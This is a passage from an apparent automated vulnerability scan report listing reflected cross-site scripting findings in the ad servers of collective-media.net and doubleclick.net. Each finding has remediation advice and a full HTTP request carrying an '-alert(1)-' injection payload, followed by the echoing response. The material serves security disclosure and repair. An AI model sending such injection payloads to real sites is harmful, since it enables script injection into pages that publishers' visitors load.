the value crosses.

Request

GET /cmadjab2ef'-alert(1)-'63371fe5300/uol.collective/ColeHaan_MM_Openness_CMN_13109;dcove=o;sz=300x250;net=uol;ord=1655200;env=ifr;ord1=605483;cmpgurl=http%253A//www.bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:46 GMT
Connection: close
Content-Length: 7828

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("uol-5182855_1296266086","http://ad.doubleclick.net/adjab2ef'-alert(1)-'63371fe5300/uol.collective/ColeHaan_MM_Openness_CMN_13109;net=uol;u=,uol-5182855_1296266086,11d765b6a10b1b3,ent,mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-bk.r
...[SNIP]...

4.76. http://a.collective-media.net/cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 577b8'-alert(1)-'80d1667b19e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

The reflected value lands inside the single-quoted document.write('...') string that emits the ad <script> tag, so a single quote in the input terminates that string and whatever follows is evaluated as JavaScript; the '-alert(1)-' canary reopens the string with its second quote so the rest of the script still parses. Because this response is a script that publisher pages load with a <script> tag (the Referer shows the bostonherald.com ad loader), the injected code executes in the including page's origin, not in a.collective-media.net's. Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent; if at all possible, the application should avoid echoing user data within this context. Where a value must be echoed, validate it against its expected grammar first (ad unit path segments and the sz value have simple fixed formats, and parameter names the server does not recognise should not be echoed at all), then apply JavaScript string escaping (\xHH or \uHHHH for every non-alphanumeric character) at every string boundary the value crosses.

Request

GET /cmadj/uol.collective577b8'-alert(1)-'80d1667b19e/ColeHaan_MM_Openness_CMN_13109;dcove=o;sz=300x250;net=uol;ord=1655200;env=ifr;ord1=605483;cmpgurl=http%253A//www.bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:46 GMT
Connection: close
Content-Length: 7822

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("uol-45286728_1296266086","http://ad.doubleclick.net/adj/uol.collective577b8'-alert(1)-'80d1667b19e/ColeHaan_MM_Openness_CMN_13109;net=uol;u=,uol-45286728_1296266086,11d765b6a10b1b3,ent,mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-bk.rdst1-cm.cm_aa_
...[SNIP]...

4.77. http://a.collective-media.net/cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9d04'-alert(1)-'7d08933297b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

The reflected value lands inside the single-quoted document.write('...') string that emits the ad <script> tag, so a single quote in the input terminates that string and whatever follows is evaluated as JavaScript; the '-alert(1)-' canary reopens the string with its second quote so the rest of the script still parses. Because this response is a script that publisher pages load with a <script> tag (the Referer shows the bostonherald.com ad loader), the injected code executes in the including page's origin, not in a.collective-media.net's. Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent; if at all possible, the application should avoid echoing user data within this context. Where a value must be echoed, validate it against its expected grammar first (ad unit path segments and the sz value have simple fixed formats, and parameter names the server does not recognise should not be echoed at all), then apply JavaScript string escaping (\xHH or \uHHHH for every non-alphanumeric character) at every string boundary the value crosses.

Request

GET /cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109b9d04'-alert(1)-'7d08933297b;dcove=o;sz=300x250;net=uol;ord=1655200;env=ifr;ord1=605483;cmpgurl=http%253A//www.bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:47 GMT
Connection: close
Content-Length: 7822

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("uol-16390671_1296266087","http://ad.doubleclick.net/adj/uol.collective/ColeHaan_MM_Openness_CMN_13109b9d04'-alert(1)-'7d08933297b;net=uol;u=,uol-16390671_1296266087,11d765b6a10b1b3,ent,mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-c
...[SNIP]...

4.78. http://a.collective-media.net/cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [dcove parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109

Issue detail

The value of the dcove request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 919b4'-alert(1)-'321da0909a2 was submitted in the dcove parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

The reflected value lands inside the single-quoted document.write('...') string that emits the ad <script> tag, so a single quote in the input terminates that string and whatever follows is evaluated as JavaScript; the '-alert(1)-' canary reopens the string with its second quote so the rest of the script still parses. Because this response is a script that publisher pages load with a <script> tag (the Referer shows the bostonherald.com ad loader), the injected code executes in the including page's origin, not in a.collective-media.net's. Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent; if at all possible, the application should avoid echoing user data within this context. Where a value must be echoed, validate it against its expected grammar first (ad unit path segments and the sz value have simple fixed formats, and parameter names the server does not recognise should not be echoed at all), then apply JavaScript string escaping (\xHH or \uHHHH for every non-alphanumeric character) at every string boundary the value crosses.

Request

GET /cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109;dcove=919b4'-alert(1)-'321da0909a2 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:38 GMT
Connection: close
Content-Length: 7768

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h;;dcove=919b4'-alert(1)-'321da0909a2;contx=none;dc=w;btg=mm.aa1;btg=mm.ac1;btg=mm.ad1;btg=mm.ae5;btg=mm.af5;btg=mm.ak1;btg=mm.ap5;btg=mm.aq1;btg=mm.ar1;btg=mm.au1;btg=mm.da1;btg=mm.db2;btg=ex.32;btg=ex.76;btg=bk.rdst1;btg=cm.cm_aa_gn1;bt
...[SNIP]...

4.79. http://a.collective-media.net/cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e086f'-alert(1)-'c94bc7b20f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109?e086f'-alert(1)-'c94bc7b20f7=1 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7761
Date: Sat, 29 Jan 2011 05:19:40 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("uol-57677525_1296278380","http://ad.doubleclick.net//uol.collective/ColeHaan_MM_Openness_CMN_13109?e086f'-alert(1)-'c94bc7b20f7=1;net=uol;u=,uol-57677525_1296278380,11d765b6a10b1b3,none,mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfa
...[SNIP]...

4.80. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4406.Valueclick/B5146746.7

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de995"-alert(1)-"613dfd0b404 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4406.Valueclick/B5146746.7;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=54393&c=0de995"-alert(1)-"613dfd0b404&tp=8&forced_click=;ord=20110129011946?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6003
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:22 GMT
Expires: Sat, 29 Jan 2011 05:20:22 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:45 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
et/click%3Bh%3Dv8/3a9e/f/7e/%2a/i%3B235159500%3B0-0%3B0%3B59006743%3B4307-300/250%3B40327689/40345476/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=54393&c=0de995"-alert(1)-"613dfd0b404&tp=8&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi");
var fscUrl = url;
var fscUrlClickTagFound = false;
v
...[SNIP]...

4.81. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4406.Valueclick/B5146746.7

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee1bd'-alert(1)-'3c2321e8777 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4406.Valueclick/B5146746.7;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=54393&c=0ee1bd'-alert(1)-'3c2321e8777&tp=8&forced_click=;ord=20110129011946?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6003
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:23 GMT
Expires: Sat, 29 Jan 2011 05:20:23 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:45 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
et/click%3Bh%3Dv8/3a9e/f/7e/%2a/i%3B235159500%3B0-0%3B0%3B59006743%3B4307-300/250%3B40327689/40345476/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=54393&c=0ee1bd'-alert(1)-'3c2321e8777&tp=8&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi\">
...[SNIP]...

4.82. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [forced_click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4406.Valueclick/B5146746.7

Issue detail

The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48133'-alert(1)-'2b1ac901df0 was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4406.Valueclick/B5146746.7;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=54393&c=0&tp=8&forced_click=48133'-alert(1)-'2b1ac901df0 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5961
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:27 GMT
Expires: Sat, 29 Jan 2011 05:20:27 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:45 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
a9e/7/7e/%2a/i%3B235159500%3B0-0%3B0%3B59006743%3B4307-300/250%3B40327689/40345476/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=54393&c=0&tp=8&forced_click=48133'-alert(1)-'2b1ac901df0http://www.marriott.com/setSCtracking.mi?scid=2011118D1878000004&mid=/marriott/hotels-resorts/weekendbonus.mi\">
...[SNIP]...

4.83. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [forced_click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4406.Valueclick/B5146746.7

Issue detail

The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f109"-alert(1)-"9fa48e39d89 was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4406.Valueclick/B5146746.7;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=54393&c=0&tp=8&forced_click=9f109"-alert(1)-"9fa48e39d89 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5961
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:27 GMT
Expires: Sat, 29 Jan 2011 05:20:27 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:45 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
a9e/7/7e/%2a/i%3B235159500%3B0-0%3B0%3B59006743%3B4307-300/250%3B40327689/40345476/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=54393&c=0&tp=8&forced_click=9f109"-alert(1)-"9fa48e39d89http://www.marriott.com/setSCtracking.mi?scid=2011118D1878000004&mid=/marriott/hotels-resorts/weekendbonus.mi");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = ""
...[SNIP]...

4.84. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [m parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4406.Valueclick/B5146746.7

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5824"-alert(1)-"01a281d1dec was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4406.Valueclick/B5146746.7;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6a5824"-alert(1)-"01a281d1dec&sid=54393&c=0&tp=8&forced_click=;ord=20110129011946?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6003
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:19 GMT
Expires: Sat, 29 Jan 2011 05:20:19 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:45 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
.doubleclick.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/i%3B235159500%3B0-0%3B0%3B59006743%3B4307-300/250%3B40327689/40345476/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6a5824"-alert(1)-"01a281d1dec&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi");
var fscUrl = url;
var fscUrlClickTagFou
...[SNIP]...

4.85. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [m parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4406.Valueclick/B5146746.7

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 985b8'-alert(1)-'e81dfefbfce was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4406.Valueclick/B5146746.7;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6985b8'-alert(1)-'e81dfefbfce&sid=54393&c=0&tp=8&forced_click=;ord=20110129011946?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6003
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:20 GMT
Expires: Sat, 29 Jan 2011 05:20:20 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:45 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
.doubleclick.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/i%3B235159500%3B0-0%3B0%3B59006743%3B4307-300/250%3B40327689/40345476/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6985b8'-alert(1)-'e81dfefbfce&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi\">
...[SNIP]...

4.86. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [mid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4406.Valueclick/B5146746.7

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload faa55'-alert(1)-'c93eebcb7dc was submitted in the mid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4406.Valueclick/B5146746.7;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=256292&mid=520391faa55'-alert(1)-'c93eebcb7dc&m=6&sid=54393&c=0&tp=8&forced_click=;ord=20110129011946?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6003
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:17 GMT
Expires: Sat, 29 Jan 2011 05:20:17 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:45 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
//ad.doubleclick.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/i%3B235159500%3B0-0%3B0%3B59006743%3B4307-300/250%3B40327689/40345476/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=256292&mid=520391faa55'-alert(1)-'c93eebcb7dc&m=6&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi\">
